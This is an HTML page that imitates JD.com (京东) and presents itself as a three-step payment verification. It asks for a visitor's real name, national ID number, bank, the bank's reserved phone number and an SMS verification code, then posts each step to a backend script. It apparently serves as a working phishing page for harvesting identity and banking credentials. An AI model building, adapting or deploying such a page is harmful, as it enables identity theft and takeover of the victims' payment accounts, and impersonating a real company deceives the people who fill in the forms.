<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>京东支付验证流程</title>
    <style>
        /* 保持原有CSS样式不变 */
        :root { font-size: 14px; }
        body { font-family: "Microsoft Yahei", Arial, sans-serif; margin: 0; padding: 0; background: #f5f5f5; min-width: 320px; }
        .container { max-width: 1200px; margin: 0 auto; padding: 0 15px; }
        .header { background: #e4393c; padding: 12px 0; }
        .logo { font-size: 1.5rem; margin-left: 10px; color: white; }
        .steps { display: flex; justify-content: center; margin: 20px 0; gap: 10px; flex-wrap: wrap; }
        .step-item { text-align: center; flex: 1; min-width: 80px; }
        .step-num { width: 26px; height: 26px; background: #ccc; border-radius: 50%; line-height: 26px; margin: 0 auto 10px; color: white; font-size: 0.9rem; }
        .step-num.active { background: #e4393c; }
        .form-container { background: white; padding: 20px; width: 90%; max-width: 400px; margin: 15px auto; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
        .form-group { margin-bottom: 20px; }
        label { display: block; margin-bottom: 8px; color: #666; }
        input, select { width: 100%; padding: 12px; border: 1px solid #ddd; border-radius: 4px; box-sizing: border-box; font-size: 1rem; }
        button { background: #e4393c; color: white; border: none; padding: 12px; border-radius: 4px; cursor: pointer; width: 100%; font-size: 1rem; transition: background 0.3s; }
        button:hover { background: #c73134; }
        .countdown { width: 80px; height: 80px; margin: 20px auto; position: relative; }
        .countdown-circle { transform: rotate(-90deg); width: 100%; height: 100%; }
        .countdown-circle circle { stroke-dasharray: 283; stroke-dashoffset: 0; stroke-linecap: round; stroke-width: 4; fill: none; transition: stroke-dashoffset 1s linear; stroke: #e4393c; }
        .countdown-text { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); font-size: 1rem; cursor: pointer; }
        .page { display: none; }
        .page.active { display: block; }
        @media (max-width: 480px) {
            :root { font-size: 13px; }
            .form-container { width: 95%; padding: 15px; }
            input, button { padding: 10px; }
            h2 { font-size: 1.2rem; margin: 10px 0; }
            .step-item { margin: 0 8px; font-size: 0.8rem; }
        }
    </style>
</head>
<body>
    <div class="header">
        <div class="container">
            <div class="logo">京东</div>
        </div>
    </div>

    <div class="steps">
        <div class="step-item">
            <div class="step-num active">1</div>
            <div>身份验证</div>
        </div>
        <div class="step-item">
            <div class="step-num">2</div>
            <div>支付验证</div>
        </div>
        <div class="step-item">
            <div class="step-num">3</div>
            <div>验证码</div>
        </div>
    </div>

    <!-- 第一步：实名认证 -->
    <div id="page1" class="page active">
        <div class="form-container">
            <h2>实名认证</h2>
            <form id="form1">
                <input type="hidden" name="step" value="1">
                <div class="form-group">
                    <label>姓名</label>
                    <input type="text" name="name" required>
                </div>
                <div class="form-group">
                    <label>身份证号</label>
                    <input type="text" name="idcard" required pattern="\d{17}[\dX]">
                </div>
                <button type="submit">提交</button>
            </form>
        </div>
    </div>

    <!-- 第二步：银行卡验证 -->
    <div id="page2" class="page">
        <div class="form-container">
            <h2>银行卡支付</h2>
            <form id="form2">
                <input type="hidden" name="step" value="2">
                <div class="form-group">
                    <label>选择银行</label>
                    <select name="bank" required>
                        <option value="">请选择银行</option>
                        <option value="icbc">工商银行</option>
                        <option value="ccb">建设银行</option>
                        <option value="abc">农业银行</option>
                    </select>
                </div>
                <div class="form-group">
                    <label>预留手机号</label>
                    <input type="tel" name="phone" required pattern="\d{11}">
                </div>
                <button type="submit">提交</button>
            </form>
        </div>
    </div>

    <!-- 第三步：验证码 -->
    <div id="page3" class="page">
        <div class="form-container">
            <h2>短信验证码</h2>
            <form id="form3">
                <input type="hidden" name="step" value="3">
                <div class="form-group">
                    <label>验证码</label>
                    <input type="text" name="code" required>
                </div>
                <button type="submit">验证</button>
            </form>
            <div class="countdown">
                <svg class="countdown-circle">
                    <circle r="36" cx="40" cy="40"/>
                </svg>
                <div class="countdown-text">60s</div>
            </div>
        </div>
    </div>

    <script>
        let currentPage = 1;
        let countdownTimer = null;
        const pages = document.querySelectorAll('.page');
        const steps = document.querySelectorAll('.step-num');
        const circumference = 2 * Math.PI * 36;

        // 页面切换函数
        function showPage(pageNumber) {
            pages.forEach(page => page.classList.remove('active'));
            document.getElementById(`page${pageNumber}`).classList.add('active');
            steps.forEach((step, index) => step.classList.toggle('active', index < pageNumber));
        }

        // 通用提交处理
        function handleFormSubmit(formId, successCallback) {
            const form = document.getElementById(formId);
            form.addEventListener('submit', async (e) => {
                e.preventDefault();
                const formData = new FormData(form);

                try {
                    const response = await fetch('submit.php', {
                        method: 'POST',
                        body: formData
                    });
                    
                    if (!response.ok) throw new Error('网络响应异常');
                    const data = await response.json();

                    if (data.status === 'success') {
                        successCallback(data);
                    } else {
                        alert(`提交失败: ${data.message}`);
                    }
                } catch (error) {
                    console.error('Error:', error);
                    alert('请求失败，请检查网络连接');
                }
            });
        }

        // 第一步提交
        handleFormSubmit('form1', () => showPage(2));

        // 第二步提交
        handleFormSubmit('form2', () => {
            showPage(3);
            startCountdown();
        });

        // 第三步提交
        handleFormSubmit('form3', () => {
            clearInterval(countdownTimer);
            document.querySelector('.countdown-text').textContent = '验证成功';
            document.querySelector('.countdown-circle circle').style.strokeDashoffset = 0;
            alert('身份验证成功！');
            window.location.href = 'success.html';
        });

        // 倒计时功能
        function startCountdown() {
            const circle = document.querySelector('.countdown-circle circle');
            const text = document.querySelector('.countdown-text');
            let time = 60;

            if(countdownTimer) clearInterval(countdownTimer);
            
            circle.style.strokeDasharray = circumference;
            circle.style.strokeDashoffset = 0;
            text.textContent = '60s';

            countdownTimer = setInterval(() => {
                time--;
                text.textContent = `${time}s`;
                const offset = circumference - (circumference * time) / 60;
                circle.style.strokeDashoffset = offset;

                if(time <= 0) {
                    clearInterval(countdownTimer);
                    text.textContent = '重新发送';
                }
            }, 1000);
        }

        // 重新发送验证码
        document.querySelector('.countdown-text').addEventListener('click', function() {
            if(this.textContent === '重新发送') {
                startCountdown();
            }
        });

        // 移动端输入优化
        document.querySelectorAll('input').forEach(input => {
            input.addEventListener('focus', function() {
                window.scrollTo({
                    top: this.offsetTop - 100,
                    behavior: 'smooth'
                });
            });
        });
    </script>
</body>
</html>